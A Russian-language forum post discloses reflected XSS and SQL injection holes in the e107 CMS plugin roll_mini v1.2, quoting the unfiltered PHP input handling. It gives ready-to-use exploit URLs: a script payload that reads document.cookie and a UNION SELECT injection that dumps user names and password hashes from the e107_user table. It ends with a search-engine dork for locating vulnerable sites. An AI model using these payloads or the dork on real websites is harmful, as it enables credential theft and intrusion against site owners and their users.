14.12.2010, 14:52
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
roll_mini v1.2
XSS:
/roll.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]]; else[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Пример:
Код:
http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Необходимы права администратора, SQL injection:
/roll.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]]; else[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'add'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$add[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'add'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$edit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'card_id'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$card_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'card_id'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'index_name'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$index_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'index_name'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]; } else {[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]; }
[/COLOR][/COLOR]
А дальше там обращения к БД с этими переменными. Ничего не фильтруется.
Пример:
Код:
http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1
Путь:
http://e107/e107_plugins/roll_mini/search.php
Дорк:inurl:e107_plugins/roll_mini/
|
|
|